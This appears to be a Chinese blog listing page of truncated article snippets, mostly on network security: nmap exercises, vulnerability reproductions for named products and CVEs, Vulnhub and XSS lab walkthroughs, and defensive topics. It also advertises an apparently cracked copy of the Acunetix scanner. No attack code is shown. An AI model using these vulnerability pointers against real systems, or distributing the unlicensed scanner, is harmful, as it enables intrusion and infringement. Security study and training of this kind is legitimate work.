nmap扫描渗透测试 1.通过BT5对服务器场景Linux进行TCP同步扫描 (使用工具Nmap，使用参数n，使用必须要使用的参数)，并将该操作使用命令中必须要使用的参数作为Flag提交； Flag：sS 2.通过BT5对服务器场景Linux进行TCP同步扫描 (使用工具Nmap，使用参数n，使用必须要使用的参数…

Python-4-布尔，运算符，if

安全防御之授权和访问控制技术

授权和访问控制技术是安全防御中的重要组成部分，主要用于管理和限制对系统资源（如数据、应用程序等）的访问。授权控制用户可访问和操作的系统资源，而访问控制技术则负责在授权的基础上，确保只有经过授权的用户才能访问…

漏洞复现--海康威视IP网络对讲广播系统远程命令执行

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

安全防御之身份鉴别技术

身份认证技术用于在计算机网络中确认操作者的身份。在计算机网络世界中，用户的身份信息是用一组特定的数据来表示的，计算机也只能识别用户的数字身份。身份认证技术能够作为系统安全的第一道防线，主要用于确认网络用户的身份，防止…

报告解读：中国新一代终端安全市场洞察，2023

报告解读中国新一代终端安全市场洞察 2023 安全防御的“最前线” 01 混沌的企业安全以下来自CSO们最关注的安全热点问题： Q1我们如何看待当下泛化的终端安全，混合的IT环境企业面临的安全变化？ IDC：伴随着全球数字化转型的快…

ubuntu远程桌面连接之novnc

一、前言该操作是为了实现vnc桌面连接为url连接方式，且在浏览器中可以对ubuntu进行操作。在使用novnc进行操作前，需要先安装vnc才可。ubuntu下如何安装vnc，可看博主前面写的一篇文，ubuntu远程桌面连接之vnc-CSDN博客，…

Vulnhub-DC1

前言一个比较简单的实战靶场，官方要求是找到/root下的flag，所以直接提权即可。但对于学习和训练来说还是太简略了，在打靶场的时候还是全面一些较好。本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提…

漏洞复现--GitLab 任意用户密码重置漏洞（CVE-2023-7028）

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

计算机网络的常用的网络通信命令（Windows）

ping：它是用来检查网络是否通畅或者网络连接速度的命令。ping命令利用的原理是：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目…

防火墙双机热备之配置过程指导

一、组网类型及模式的确定 1、组网类型结合自身网络的特点，常见一下四种组网： 防火墙业务接口工作在第三层，连接二层交换机、防火墙业务接口工作在第三层，连接路由器、防火墙业务接口工作在第二层，连接二层交换机、…

网站漏洞扫描 awvs 23.11下载 Acunetix Premium build 23.11 for Linux 完美版

Acunetix Premium build 23.11 for Linux 完美版更新日志： 网站漏洞扫描 awvs 23.11下载新功能 Java IAST 传感器已更新为支持 Java 17 并删除了对 AspectJWeaver 的要求对管理适用于 Docker 和 Linux 的 Acunetix On-Premises 服务的机制进行了更改&#xff0…

手机上最危险的3个操作，千万小心！

普通人千万不要在手机上做这3个操作，否则你的手机早晚会被黑客入侵了。第一种，苹果越狱越狱虽然可以绕过限制给你的苹果安装上一些特殊软件，但只要是越狱之后的苹果手机，都将留下漏洞，黑客最喜欢寻找做过越狱的手机…

*（长期更新）软考网络工程师学习笔记——Section 22 无线局域网

目录一、IEEE 802.11的定义二、IEEE 802.11系列标准三、IEEE 802.11的两种工作模式四、CDMA/CA协议（一）CDMA/CA协议的定义（二）CDMA/CA协议的过程五、AC与AP（一）接入控制器AC（二）无…

网络安全全栈培训笔记（53-WEB攻防-通用漏洞CRLF注入URL重定向资源处理拒绝服务）

第53天 WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务知识点： 1、CRLF注入-原理&检测&利用 2、URL重定向-原理&检测&利用 3、Web拒绝服务-原理&检测&利用 #下节预告： 1、JSONP&CORS跨域 2、域名安全…

$矩阵行列式的四大应用$

矩阵行列式的四大应用

目录一. 介绍二. 行列式的基本性质 2.1 单位阵的行列式 2.2 交换行位置的行列式三. 矩阵求逆与行列式四. 体积与行列式五. 矩阵主元与行列式六. 解方程与矩阵行列式七. 小结一. 介绍行列式可以反应矩阵的很多性质，比如可以求矩阵的逆&#xff0c…

网络/信息安全（黑客）技术——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

XSS漏洞：xss-labs靶场通关

xss系列往期文章： 初识XSS漏洞-CSDN博客利用XSS漏洞打cookie-CSDN博客目录第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关第十三关第十四关第十五关第十六关第十七关第十八关第十九关 …

【现代密码学】笔记6--伪随机对象的理论构造《introduction to modern cryphtography》

【现代密码学】笔记6--伪随机对象的理论构造《introduction to modern cryphtography》写在最前面6 伪随机对象的理论构造写在最前面主要在哈工大密码学课程张宇老师课件的基础上学习记录笔记。内容补充：骆婷老师的PPT 《introduction to modern cryphtogr…

使用WAF防御网络上的隐蔽威胁之SQL注入攻击

SQL注入攻击是一种普遍存在且危害巨大的网络安全威胁，它允许攻击者通过执行恶意的SQL语句来操纵或破坏数据库。这种攻击不仅能够读取敏感数据，还可能用于添加、修改或删除数据库中的记录。因此，了解SQL注入攻击的机制及其防御策略对于保护网…

利用网络威胁情报增强网络安全态势

在当今的网络威胁形势下，明智且主动的防御策略至关重要。网络威胁情报是组织的重要工具，可帮助他们预测和应对网络风险。网络威胁情报不仅提供原始数据，还提供： 深入了解网络攻击者的动机了解他们的潜在目标了解他们的战术通过…

网络安全—SSL安全访问应用

文章目录网络拓扑部署CA服务器颁发证书开启Web服务安装IIS服务修改Web默认网页申请Web证书前提准备申请文件生成申请web证书开始安装web证书客户机访问web默认网站使用HTTP使用HTTPS 为客户机安装浏览器证书环境：Windows Server 2003 网络拓扑这里使用NAT还是…

不要盲目自学网络安全！学习顺序特别重要！

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

金和OA SAP_B1Config.aspx存在未授权访问漏洞

产品简介金和网络是专业信息化服务商，为城市监管部门提供了互联网监管解决方案，为企事业单位提供组织协同OA系统升开发平台，电子政务一体化平台智慧电商平合等服务漏洞概述金和OA SAP_B1Config.aspx存在未授权访问漏洞，攻击…

案例精选｜淄博绿能燃气工程有限公司日志审计系统建设方案

淄博绿能燃气工程有限公司，成立于1994年，前身为淄博市煤气公司管道液化气分公司。公司业务主要涉及天然气、液化气等市政工程施工及城镇燃气供应等领域，具有市政公用工程施工总承包二级资质，《压力管道安装许可证》压力管道安装GB…

CNAS中兴新支点——什么是安全测试，安全测试报告有什么作用，主要测试哪些内容？

1.安全测试在做什么？ 扫描？在很多人眼中，做安全的就是整天那个工具在哪里扫描操作，使用各种不同的工具做扫描。是的，扫描是安全测试很重要的一部分，扫描可快速有效发现问题。扫描工具的易用性&#xff0…

CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞

CVE-2023-36025是微软于11月补丁日发布的安全更新中修复Windows SmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞，对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过Windows Defender SmartScreen检查及其相关提示。该漏洞的攻击…

对Tor的去匿名化攻击的调查

文章信息论文题目：De-Anonymisation Attacks on Tor: A Survey 期刊（会议）： IEEE Communications Surveys & Tutorials 时间：2021 级别：中科院1区（IF：35.6） 文章链…

Python中的变量是什么？数据类型又有哪些？

Python 语言的基础构成要素：变量与数据类型。因为不仅是 Python，变量与数据类型可以说是所有编程语言的核心。掌握了语言的变量与数据类型的体系，可以说就掌握了这门语言的一大半儿。 1、什么是变量我们都知道应用程序在运行阶段的数据存放…

OSPF多区域配置-新版（12）

目录整体拓扑操作步骤 1.基本配置 1.1 配置R1的IP 1.2 配置R2的IP 1.3 配置R3的IP 1.4 配置R4的IP 1.5 配置R5的IP 1.6 配置R6的IP 1.7 配置PC-1的IP地址 1.8 配置PC-2的IP地址 1.9 配置PC-3的IP地址 1.10 配置PC-4的IP地址 1.11 检测R5与PC1连通性 1.12 检测…